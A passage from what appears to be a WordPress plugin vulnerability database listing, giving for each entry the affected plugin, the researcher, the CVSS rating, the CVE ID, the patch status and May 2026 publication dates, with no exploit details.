Divi Form Builder [divi-form-builder]

Researcher

CVSS Rating
9.8 (Critical)

CVE-ID

CVE-2026-7284

Patch Status
Patched

Published
May 19, 2026

Affected Software

Easy Elements for Elementor – Addons & Website Templates [easy-elements]

Researcher

Ankit Patel

CVSS Rating
9.8 (Critical)

CVE-ID

CVE-2026-45444

Patch Status
Patched

Published
May 20, 2026

Affected Software

Gift Cards For WooCommerce Pro [giftware]

Researcher

Joe Bruno

CVSS Rating
9.8 (Critical)

CVE-ID

CVE-2026-42731

Patch Status
Patched

Published
May 24, 2026

Affected Software

miniOrange OTP Login, Verification and SMS Notifications [miniorange-otp-verification]

Researcher

Peng Zhou

CVSS Rating
9.8 (Critical)

CVE-ID

CVE-2026-4885

Patch Status
Unpatched

Published
May 18, 2026

Affected Software

Piotnet Addons For Elementor Pro [piotnet-addons-for-elementor-pro]

Researcher

Wannes Verwimp

CVSS Rating
9.8 (Critical)

CVE-ID

CVE-2026-4883

Patch Status
Unpatched

Published
May 18, 2026

Affected Software

Piotnet Forms [piotnetforms-pro]

Researcher

CVSS Rating
9.8 (Critical)

CVE-ID

CVE-2026-6555

Patch Status
Unpatched

Published
May 19, 2026

Affected Software

ProSolution WP Client [prosolution-wp-client]

Researcher

snr

CVSS Rating
8.8 (High)

CVE-ID

CVE-2026-6456

Patch Status
Unpatched

Published
May 19, 2026

Affected Software

Account Switcher [account-switcher]

Researcher

Ren Voza

CVSS Rating
8.8 (High)

CVE-ID

CVE-2026-5200

Patch Status
Patched

Published
May 19, 2026

Affected Software

AcyMailing – An Ultimate Newsletter Plugin and Marketing Automation Solution for WordPress [acymailing]

Researcher

Azril Fathoni (kiseki)

CVSS Rating
8.8 (High)

CVE-ID

CVE-2026-7522

Patch Status
Patched

Published
May 19, 2026

Affected Software

Advanced Database Cleaner – Premium [advanced-database-cleaner-premium]

Researcher